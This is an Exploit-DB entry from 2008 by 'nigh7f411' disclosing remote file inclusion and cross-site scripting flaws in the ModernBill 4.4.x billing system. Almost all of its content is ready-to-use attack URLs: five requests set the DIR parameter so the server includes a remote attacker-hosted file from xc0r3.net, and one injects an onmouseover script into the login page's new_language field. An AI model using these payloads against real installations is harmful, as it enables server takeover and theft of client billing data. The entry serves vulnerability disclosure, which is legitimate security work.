ModernBill 4.4.x - Cross-Site Scripting / Remote File Inclusion

EDB-ID:

6916

CVE:

2008-5060 2008-5059

EDB Verified:

Author:

nigh7f411

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2008-10-31

Vulnerable App:

**************************************************************************************
ModernBill .:. Client Billing System - User Login
ModernBill  <= v4.4.X Remote File Inclusion Vulnerability  and xss by nigh7f411
http://xc0r3.net/
plezz go to ttp://xc0r3.net/forums/
**************************************************************************************

rfi
http://poop.com/include/scripts/export_batch.inc.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/scripts/run_auto_suspend.cron.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/scripts/send_email_cache.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/html/nettools.popup.php?DIR=http://xc0r3.net/x2300.txt?

xss
http://poop.com/index.php?op=login&submit=submit&submit=submit&username=111-222-1933email@address.tst&password=111-222-1933email@address.tst&new_language="+onmouseover=alert(39660.2316362732)+/index.php?op=login&submit=submit&submit=submit&username=111-222-1933email@address.tst&password=111-222-1933email@address.tst&new_language="+onmouseover=alert(39660.2316362732)+

**************************************************************************************

# milw0rm.com [2008-10-31]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services